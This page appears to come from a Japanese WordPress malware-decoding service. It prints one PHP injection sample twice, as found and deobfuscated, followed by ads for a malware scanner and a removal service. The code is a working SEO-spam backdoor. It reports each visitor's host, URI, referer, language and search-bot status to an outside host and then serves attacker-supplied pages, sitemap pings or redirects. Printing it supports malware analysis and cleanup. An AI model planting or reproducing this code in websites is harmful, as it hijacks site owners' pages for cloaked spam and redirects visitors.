Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $xmlname = '%6D%77%7A%76%66%70%72%69%6A%2E%72%61%66%6E%79%69%6E%77%61%6C%2E%6B%6C%6D'; $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } $duri_tmp = drequest_uri(); if ($duri_tmp == ''){ $duri_tmp = '/'; } $duri = $duri_tmp; function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } $goweb = 'zjmiscevw.ensalvajny.xyz'; function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $host = $_SERVER['HTTP_HOST']; $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lang = $lang; $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = $urlshang; } function ping_sitemap($url){ $url_arr = explode("\r\n", trim($url)); $return_str = ''; foreach($url_arr as $pingUrl){ $pingRes = doutdo($pingUrl); $ok = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'pingok' : 'error'; $return_str .= $pingUrl . '-- ' . $ok . '<br>'; } return $return_str; } function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents= ''; if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } $web1 = $http_web . ':/'.'/' . $goweb . '/indexnew.p'; $web = $web1.'hp?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; $html_content = doutdo($web); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit(); }else if(strstr($html_content, 'okxmlgetcontent')){ $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit(); }else if(strstr($html_content, 'pingxmlgetcontent')){ $html_content = str_replace("pingxmlgetcontent", '', $html_content); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($html_content); exit(); }else if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit(); }else if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit(); } }/* blog R1-A875 */ ?>
<?php $xmlname = '%6D%77%7A%76%66%70%72%69%6A%2E%72%61%66%6E%79%69%6E%77%61%6C%2E%6B%6C%6D'; $http_web = 'http'; if (is_https()) { $http = 'https'; } else { $http = 'http'; } $duri_tmp = drequest_uri(); if ($duri_tmp == '') { $duri_tmp = '/'; } $duri = $duri_tmp; function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { $duri = $_SERVER['REQUEST_URI']; } else { if (isset($_SERVER['argv'])) { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } else { $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $duri; } $goweb = 'zjmiscevw.ensalvajny.xyz'; function is_https() { if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; } $host = $_SERVER['HTTP_HOST']; $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; $lang = $lang; $urlshang = ''; if (isset($_SERVER['HTTP_REFERER'])) { $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = $urlshang; } function ping_sitemap($url) { $url_arr = explode("\r\n", trim($url)); $return_str = ''; foreach ($url_arr as $pingUrl) { $pingRes = doutdo($pingUrl); $ok = strpos($pingRes, 'Sitemap Notification Received') !== false ? 'pingok' : 'error'; $return_str .= $pingUrl . '-- ' . $ok . '<br>'; } return $return_str; } function disbot() { $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']); if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) { return true; } else { return false; } } function doutdo($url) { $file_contents = ''; if (!$file_contents) { $file_contents = @file_get_contents($url); } return $file_contents; } $web1 = $http_web . ':/' . '/' . $goweb . '/indexnew.p'; $web = $web1 . 'hp?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang; $html_content = doutdo($web); if (!strstr($html_content, 'nobotuseragent')) { if (strstr($html_content, 'okhtmlgetcontent')) { @header("Content-type: text/html; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent", '', $html_content); echo $html_content; exit; } else { if (strstr($html_content, 'okxmlgetcontent')) { $html_content = str_replace("okxmlgetcontent", '', $html_content); @header("Content-type: text/xml"); echo $html_content; exit; } else { if (strstr($html_content, 'pingxmlgetcontent')) { $html_content = str_replace("pingxmlgetcontent", '', $html_content); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($html_content); exit; } else { if (strstr($html_content, 'getcontent500page')) { @header('HTTP/1.1 500 Internal Server Error'); exit; } else { if (strstr($html_content, 'getcontent404page')) { @header('HTTP/1.1 404 Not Found'); exit; } else { if (strstr($html_content, 'getcontent301page')) { @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page", '', $html_content); header('Location: ' . $html_content); exit; } } } } } } } /* blog R1-A875 */
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.